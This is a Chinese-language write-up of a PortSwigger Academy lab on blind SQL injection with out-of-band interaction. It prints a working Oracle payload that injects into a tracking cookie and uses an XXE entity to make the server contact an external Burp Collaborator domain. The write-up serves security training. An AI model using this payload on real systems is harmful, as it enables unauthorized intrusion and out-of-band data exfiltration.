Lab16_ Blind SQL injection with out-of-band interaction

前言：

实验室标题为：

带外交互的 SQL 盲注

简介：

本实验包含一个SQL盲目注入漏洞。应用程序使用跟踪Cookie进行分析，并执行包含提交的Cookie值的SQL查询。

SQL查询是异步执行的，对应用程序的响应没有影响。但是，您可以触发与外部域的带外交互。

要解决这个实验，利用SQL注入漏洞导致DNS查找Burp Collaborator。

注意

为了防止Academy平台被用于攻击第三方，我们的防火墙阻止了实验室与任意外部系统之间的交互。要解决实验，您必须使用Burp Collaborator的默认公共服务器。

提示：

你可以在我们的SQL注入备忘单上找到一些有用的有效载荷。

进入实验室

仍然是一个商店页面

构造 payload

在本关主要目的是体验 OOB（DNS 带外），DNS 外带的核心是让盲注变为显错注入，在无法利用漏洞获得回显的情况下，目标可以发起请求，这个时候就可以通关 DNS 请求把想获得的数据外带出来

依旧是使用 burp 进行抓包注入

利用 union 联合查询结合 xml 外部实体攻击（XXE）来构造 payload

TrackingId=x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://1prcgeu2pgeoycglrzqok5dsxj3ar2fr.oastify.com/"> %remote;]>'),'/l') FROM dual--

extractvalue()函数是 Oracle 数据库的 XML 函数，用于从 XML 片段中提取值

xmltype()构造是将字符串转换为 Oracle 的 XMLtype 对象，强制解析 XML 内容

打开 burp 中的 Collaborator，复制链接

将 payload 粘贴在 cookie 后面，并进行 url 编码

返回 Collaborator 模块，点击 Poll now，可以看到返回四个域名，以及对应的源 ip 地址

返回商店页面，可以看到通关提示